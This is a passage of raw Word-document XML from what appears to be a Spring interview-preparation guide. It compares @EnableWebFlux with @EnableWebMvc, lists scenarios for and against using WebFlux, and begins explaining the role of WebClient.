    </w:p>
    <w:p w14:paraId="726B231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Typically, you will use @EnableWebFlux when you are building a Spring application that leverag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or handling web requests in a reactive and non-blocking manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132DC30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 are using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot starter for WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>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E2FC69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92" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D038F2" w14:textId="7FBB652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9" w:name="_Toc197867733"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How is it different from @EnableWebMvc</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="519"/>
    </w:p>
    <w:p w14:paraId="2404F596" w14:textId="3C987FEB"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d @EnableWebMvc annotations in Spring are used to enable two different web frameworks—Spring WebFlux and Spring MVC—each designed for different types of applications: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive (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traditional (blocking)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, respectively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4E2E9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Differences between @EnableWebFlux and @EnableWebMvc:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5E5269"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urpose:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8C743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353356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a reactive-stack web framework built on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It is designed for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking, asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> communication, and is suitable for building reactive applications that require high scalability and low latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A33841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reactive programming paradigms and supports both functional (router-based) and annotation-based controllers (like @RestController).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655EFC2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7FC854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which is the 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framework. It is design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request processing and is typically used for applications that follow the </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet-based model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D91496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nnotation-based controllers like @Controller and @RestController in a blocking, thread-per-request model.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49BA14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Programming Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AFF27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2F5CC3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from Project Reactor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA960E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building scalable and non-blocking applications, such as APIs handling a high volume of requests concurrently, with minimal server resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF6A05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environments that need asynchronous event-driven processing, like real-time applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0671BB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543C1A0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the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where each HTTP request is processed synchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BE51C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ypically uses a thread-per-request model, where each incoming request is assigned a dedicated thread. This can become a bottleneck when handling a large number of concurrent requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40535E9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server-side rendered applications (MVC architecture).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F81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Request Handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE66ED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06363061"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asynchronous manner. This is achieved using reactive streams and is ideal for applications where the number of concurrent users is high, but the server's resources are limited.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EAB4A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2216C72"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ing Model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011FC8A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B621E37"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reactive, event-driven, non-blocking I/O model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The server processes requests without blocking the threads, allowing it to handle more requests concurrently without adding many threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DF28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3BD31F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blocking, thread-per-request model</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where each HTTP request typically consumes a separate thread for its duration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C32377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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D873B5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7FCEB7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deal for microservices, real-time applications, and APIs with a large number of concurrent clients (e.g., chat applications, financial services).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE1691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so better suited for environments with a </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>cloud-n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istributed architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and scalability in mind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E88F6F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67780FC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traditional </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>monolithic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erver-side rendered</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> web applications, such as CRUD-based web applications, and APIs with a smaller number of clients.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0401B38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ntegration with Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505166B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DDF1D9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79E519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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597D4C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CCA3B9E"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performant for </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>highly concurrent, real-time</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O-bound</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> applications, as it uses non-blocking I/O, allowing it to handle a large number of requests without consuming many threads or resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055E032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2AABD9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suitabl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applications, but may have performance limitations in handling large numbers of concurrent requests due to the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nature and thread management overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3810F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141"/>
        <w:gridCol w:w="4138"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="726B2517" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60EF95A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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="624DAC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Flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58CE038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Mvc</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="7B982DA2" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="137AE0A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ramework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C089BA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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2148A9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MVC (Traditional)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="082923CF" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="181B8FC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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="746846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Asynchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F778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Synchronous</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="02BA3B4B" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D4F6D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5B1D35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lux/Mono)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AA54E5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Traditional Servlet model)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="76D7E76E" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D8152C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ing Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2550C44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Non-blocking I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2685D20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read-per-request (Blocking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="56E7E90D" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53D6555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deal Use Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="609466C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l-time, Scalable, Concurrent APIs, Microservices</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3837FC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Web Apps, Server-side rendered apps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="65DE964E" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19E4845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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EB6F28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es (Reactive Streams API)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B82D97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Uses Thread-per-Request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="6C63CA1E" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27391EF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56550B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s large numbers of concurrent requests well</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AD5EF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y face issues with high concurrency due to blocking I/O</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B13F85" w:rsidRPr="00B13F85" w14:paraId="07877E9D" w14:textId="77777777" w:rsidTr="00281739">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B4DD69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Boot Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="042F064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flux</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B11737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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="741113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E24B28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 xml:space="preserve"> is for reactive, non-blocking, and scalable applications, while </w:t>
      </w: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 xml:space="preserve"> is for traditional, blocking, and synchronous web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2512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93" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44ED1601" w14:textId="05E6D39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0" w:name="_Toc197867734"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>In which scenarios would you use this annotation</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="520"/>
    </w:p>
    <w:p w14:paraId="4D3E74DF" w14:textId="71284183"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notation is used in scenarios where you want to enabl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the reactive programming model provided by Spring. This annotation is specifically used when you are developing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 for better scalability and concurrency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7016790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are scenarios where you would use the @EnableWebFlux annotation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292E28E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al-Time Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE52A9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Chat applications, live updates, gaming backends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749F036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ideal for handling a large number of concurrent connections without blocking threads. Since it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it can handle many concurrent users (such as clients connected to a chat server) efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13522A5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Microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522DF2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xample:</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Microservices architectures with high throughput and low latency requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C9E94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Highly Concurrent API Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437E09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Is with a large number of clients, like stock price APIs, news aggregation services, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553034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l-Time Data Processing Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64D85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Event-driven applications or systems processing streams of data, such as IoT platforms or telemetry data collection services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CC5C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supports reactive streams using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which makes it an ideal fit for systems that need to process streams of data in real-time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B02546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Serverless Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336CE3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erless applications where you want to handle many lightweight requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737227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is non-blocking, it integrates well with serverless architectures, where functions are lightweight and request processing needs to be fast and non-blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D60C49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Data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0461B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that deal with media streaming, audio/video streaming, or continuous data feeds (e.g., sensor data).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345C58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optimized for handling large data streams asynchronously, making it ideal for building services that need to manage continuous or real-time data streams.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55BA83A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Low Latency, High Throughput Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F588C6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requiring ultra-low latency, such as high-frequency trading platforms or real-time monitoring systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330E5DB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offers high throughput and low latency because of its non-blocking nature, which is essential for applications where delays in request processing are unacceptable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="492E5F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ive Frontend Integration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130104D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ingle-page applications (SPAs) with real-time updates, like social media feeds or real-time notifications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292439E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work seamlessly with reactive JavaScript frameworks on the frontend (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RxJ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to implement real-time updates and events, improving user experience in scenarios where real-time communication is required.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCEEFF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calable Backend APIs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D7EF4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Large-scale backend APIs that provide access to resources such as databases or file systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1502707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Cloud-Native Applications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DEDD3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deployed in a cloud environment with scalability requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9001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Use of Reactive Data Sources:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05929AE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Databases that support reactive programming (e.g., MongoDB with reactive driver).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644DB9E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If your data source supports reactive operations (e.g.,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for SQL databases), using WebFlux allows you to take advantage of the non-blocking I/O model end-to-end, making your application fully reactive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E2BEC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Handling Complex I/O Bound Operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD67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ices that perform complex I/O-bound operations like calling external APIs, processing data from multiple sources, or accessing file systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D155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9BDE1">
          <v:rect id="_x0000_i2294" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F8FB7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Not to Use @EnableWebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D5217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MVC Applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: If you are building a typic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eb application with relatively low concurrency, Spring MVC (using @EnableWebMvc) might be a better choice since it is simpler and better suited for conventional use cases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26717C0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Heavy Computational Tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your application involves heavy computation that isn't asynchronous, WebFlux may not provide the expected performance improvements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB073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plications with Simple Request-Response Logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00B13F85">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For simple applications that do not require high concurrency or real-time data, Spring MVC could be a better fit, as WebFlux introduces additional complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3CCD1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6260C">
          <v:rect id="_x0000_i2295" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D94D5F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96" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851D69B" w14:textId="1C887FB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1" w:name="_Toc197867735"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the role of WebClient in Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="521"/>
    </w:p>
    <w:p w14:paraId="79951E6E" w14:textId="7F0E2CDF"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non-blocking, reactive HTTP client used for making HTTP requests in a reactive way. It is part of the spring-webflux module and serves as an alternative to the traditional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68BD68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and Purpose of WebClient in Spring WebFlux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4551AC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695998F9"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designed to work in a non-blocking manner, meaning it does not block the thread while waiting for the response from the server. This is a core feature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making it ideal for high-concurrency scenarios where many requests are handled concurrently without consuming a lot of threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D4E70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TTP Requests</w:t>
      </w:r>
